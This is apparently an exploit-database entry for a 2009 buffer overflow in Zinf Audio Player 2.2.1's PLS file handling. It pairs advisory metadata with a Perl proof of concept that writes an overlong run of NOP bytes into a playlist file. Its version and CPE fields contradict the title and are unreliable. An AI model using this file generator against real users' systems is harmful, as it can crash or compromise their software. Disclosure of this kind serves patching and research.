header-logo
Suggest Exploit
vendor:
Zinf Audio Player
by:
Hakxer
9.3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Zinf Audio Player
Affected Version From: 2.2.2001
Affected Version To: 2.2.2001
Patch Exists: Yes
Related CWE: N/A
CPE: 2.2.2001
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

Zinf Audio Player 2.2.1 (PLS FILE) Buffer Overflow PoC

A buffer overflow vulnerability exists in Zinf Audio Player 2.2.1 when processing a specially crafted PLS file. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application.

Mitigation:

Upgrade to the latest version of Zinf Audio Player.
Source

Exploit-DB raw data:

#!/usr/bin/perl
# Discovered & Written by : Hakxer
# Home : www.sec-geeks.com
# Program : http://www.zinf.org/ ../http://prdownloads.sourceforge.net/zinf/zinf-setup-2.2.1.exe
# Zinf Audio Player 2.2.1 (PLS FILE)  Buffer Overflow PoC

my $chars="\x90" x 2000;

open(MYFILE,'>>hakxer.pls');

print MYFILE $chars;

close(MYFILE);

print " PoC Created .. Hakxer [ Sec-Geeks.com ] EgY Coders Team";

# milw0rm.com [2009-01-27]